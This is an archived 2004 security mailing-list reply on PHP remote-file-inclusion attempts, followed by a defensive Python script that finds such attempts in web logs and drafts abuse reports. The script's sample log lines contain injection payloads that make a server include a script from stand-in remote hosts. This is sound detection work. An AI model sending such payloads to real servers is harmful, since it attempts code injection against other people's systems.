Re: PHP injection attempt from 200.222.244.154

From: Jez Hancock (jez.hancock_at_gmail.com)
Date: 12/05/04

  • Next message: Barrie Dempster: "Re: PHP injection attempt from 200.222.244.154"
    Date: Sun, 5 Dec 2004 00:00:50 +0000
    To: Kirby Angell <kangell@alertra.com>
    
    

    On Mon, 22 Nov 2004 20:09:22 -0600, Kirby Angell <kangell@alertra.com> wrote:
    > Haha... note to self, do not include the actual attack URL in the
    > message. Judging from this referer:
    >
    > Referer:
    > http://gmail.google.com/gmail?view=cv&search=inbox&th=10063111e32eb17b&lvp=-1&cvp=0&zx=18acabd2b173f0d8528652499
    >
    > I'd say someone got my message from this list and then clicked on the
    > URLs :-)

    That's something I noticed - I only started to get injection attempts
    on some URLs once that URL began to have content about the particular
    injection technique/vulnerability.

    For example in one weblog article I discussed the myegallery
    vulnerability and within a week or so I noticed a massive increase in
    the number of attacks on that article trying to employ injection
    techniques to exploit the hole the article talked about! I'd not
    noticed any search engines in the referer logs, but just presumed this
    was how the attack was being seeded. Such a waste of bandwidth.

    I'd thought about doing something similar to KEM Hosting's script
    above regarding turning tables or somehow automating an abuse
    complaint procedure. For a while I started to notify the owners of
    domains that were hosting the injection scripts that they possibly had
    a problem, but this got tedious quite quickly. Automating the
    procedure by intercepting the requests for bad URIs and redirecting
    them to a script that drafts together an abuse report might be
    interesting and save some time though.

    -- 
    Jez Hancock
     - System Administrator / PHP Developer
    http://munk.nu/
    http://freebsd.munk.nu/      - A FreeBSD Diary
    http://ipfwstats.sf.net/        - ipfw peruser traffic logging
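
The automation idea in the message above, sketched as an added example (not code from the thread or from any script it mentions): it scans access-log lines for query parameters whose value is a remote URL, groups the hits by the host serving the script, and drafts one abuse report per host with the URLs defanged. The log lines, parameter names, hosts and report wording are constructed; finding the abuse contact and sending the mail are left out.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined log format (not from the thread).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Dec/2004:00:01:02 +0000] "GET /blog/article.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [05/Dec/2004:00:03:44 +0000] "GET /blog/article.php?page=http://files.example.net/inc.txt? HTTP/1.0" 404 312 "-" "libwww-perl/5.79"',
    '198.51.100.9 - - [05/Dec/2004:00:05:10 +0000] "GET /gallery/index.php?basepath=http%3A%2F%2Ffiles.example.net%2Finc.txt HTTP/1.0" 404 312 "-" "libwww-perl/5.79"',
    '198.51.100.7 - - [05/Dec/2004:00:09:31 +0000] "GET /blog/article.php?page=http://www.example.org/~user/x.gif? HTTP/1.0" 404 312 "-" "libwww-perl/5.79"',
]

LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<uri>\S+)[^"]*" \d{3} ')
REMOTE_RE = re.compile(r'(?:https?|ftp)://', re.I)

def find_remote_includes(line):
    """Return (client_ip, timestamp, [remote URLs passed as parameter values]) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
    values = [v for _, v in parse_qsl(urlsplit(m['uri']).query, keep_blank_values=True)]
    remote = [v for v in values if REMOTE_RE.match(v)]
    return (m['ip'], m['ts'], remote) if remote else None

def defang(url):
    """Make the URL non-clickable so nobody follows it from the report."""
    return re.sub(r'(?i)^http', 'hxxp', url).replace('.', '[.]')

def draft_reports(lines):
    """Return {hosting_domain: report_text}, one draft per host serving the scripts."""
    by_host = {}
    for line in lines:
        hit = find_remote_includes(line)
        if hit:
            ip, ts, remote = hit
            for url in remote:
                host = urlsplit(url).hostname
                if host:
                    by_host.setdefault(host, []).append(f"  [{ts}] from {ip}: {defang(url)}")
    reports = {}
    for host, hits in by_host.items():
        head = [f"Subject: Script hosted on {host} used in PHP injection attempts", "",
                "Requests to our web server tried to make it include the URL(s) below,",
                "which are hosted on your site. The account or page may be compromised.", ""]
        reports[host] = "\n".join(head + hits)
    return reports

if __name__ == "__main__":
    for text in draft_reports(SAMPLE_LOG).values():
        print(text, end="\n\n")
```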
    
